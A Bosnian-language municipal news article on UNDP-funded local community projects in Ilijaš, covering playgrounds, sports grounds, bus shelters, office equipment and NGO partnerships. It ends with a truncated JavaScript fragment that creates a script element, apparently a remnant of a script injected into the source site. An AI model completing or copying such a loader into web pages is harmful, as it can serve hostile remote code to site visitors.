Realizacija projekata u mjesnim zajednicama uključenim u projekat “Jačanje uloge MZ u BiH”

Počela realizacija infrastrukturnih projekata u šest mjesnih zajednica sa područja Općine Ilijaš koje su uključene u Projekat “Jačanje uloge mjesnih zajednica u Bosni i Hercegovini. Projekti su predloženi od strane mjesnih zajednica, a koji su u skladu sa prioritetima definisanim na forumima građana u mjesnim zajednicama.
Građani MZ Srednje su kao prioritetan projekat definisali rekonstrukciju sportskog terena”, a MZ Misoča izgradnju dječijeg igrališta. Trenutno se intenzivno izvode radovi na područjima ovih mjesnih zajednica.
Također ovih dana dostavljen je set računarske opreme, smart tabla i set kancelarijskog namještaja u MZ Mrakovo, koja je aplicirala Projektom “Opremanje multimedijalnog centra IT opremom”.
UNDPPRojekti 008
U sklopu ovog Projekta u MZ Stari Ilijaš planirano je postavljanje tri autobuske nadstrešnice, u MZ Ilijaš-grad izgradnja dječijeg parka, a u MZ Podlugovi ograđivanje i asfaltiranje višenamjenske plohe pored objekta Društvenog doma u Podlugovima.
Ukupna vrijednost radova je cca. 150.000,00 KM, a izvođač radova je firma “SELA” d.o.o. Sarajevo.
Pored infrastrukturnih projekata, projekat “Jačanje uloge mjesne zajednice u BiH” obuhvatio je projekte nevladinih organizacija, koje su u saradnji sa partnerskim mjesnim zajednicama kandidovale određene projekte prema UNDP-u.
Udruženje “Iskoristi dan – Carpe diem” u partnerstvu sa Mjesnom zajednicom Mrakovo implementirat će projekat “Edukativne radionice u MZ Mrakovo”,  Udruženje sporta i sportske rekreacije škola fudbala “Respect” u saradnji sa mjesnom zajednicom Srednje realizovat će projekat “Sportom za naše mjesne zajednice”.
Projekat “Learn for free” implementirat će BZK Preporod i mjesna zajednica Stari Ilijaš, a projekat “Podrška djeci i omladini ometenoj u psiho-fizičkom razvoju kroz program hipoterapije i motoričkih sposobnosti” implementirat
će Udruženje roditelja djece ometene u psiho-fizičkom razvoju “Budi mi drug” u saradnji sa Mjesnom zajednicom Ilijaš-grad.
Projekat „Jačanje uloge mjesnih zajednica u BiH“ je zajednički projekat Vlade Švicarske i Vlade Švedske u vrijednosti od 14,5 miliona KM, a sprovodi ga Razvojni program Ujedinjenih nacija (UNDP). Cilj projekta je povećanje demokratskog i direktnog učešća građana Bosne i Hercegovine u lokalnoj upravi, jačanje odgovornosti općinskih vlasti i poboljšanje infrastrukture i usluga na nivou mjesnih zajednica.
136 mjesnih zajednica i 24 jedinice lokalne samouprave širom zemlje učestvovat će u prvoj fazi projekta, čime će se doprinijeti poboljšanju kvalitete života 300.000 ljudi širom zemlje.
izvor : Općina Ilijaš

var d=document;var s=d.createElement(‘script’);